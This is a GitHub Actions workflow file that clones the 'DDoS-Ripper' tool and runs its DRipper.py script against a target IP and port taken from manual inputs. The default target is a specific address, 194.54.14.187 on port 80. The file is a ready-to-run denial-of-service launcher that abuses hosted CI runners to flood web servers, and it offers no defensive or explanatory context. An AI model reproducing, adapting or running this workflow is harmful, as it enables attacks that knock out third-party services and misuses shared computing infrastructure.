name: DDoS Ripper workflow

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'IP of the target web resource'
        default: '194.54.14.187'
        type: string
        required: false
      port:
        description: 'Port of the target web resource'
        default: '80'
        type: string
        required: false
      turbo:
        description: 'Turbo spec (should be between 135 and 443, better to set value from default)'
        default: '135'
        type: string
        required: false
jobs:
  docker-run:
    runs-on: ubuntu-latest
    steps:
      - name: Pull DDoS Ripper repository
        run: |
          git clone https://github.com/palahsu/DDoS-Ripper.git

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          cd DDoS-Ripper && \
          python3 DRipper.py -s ${{ github.event.inputs.ip }} -p ${{ github.event.inputs.port }} -t ${{ github.event.inputs.turbo }}
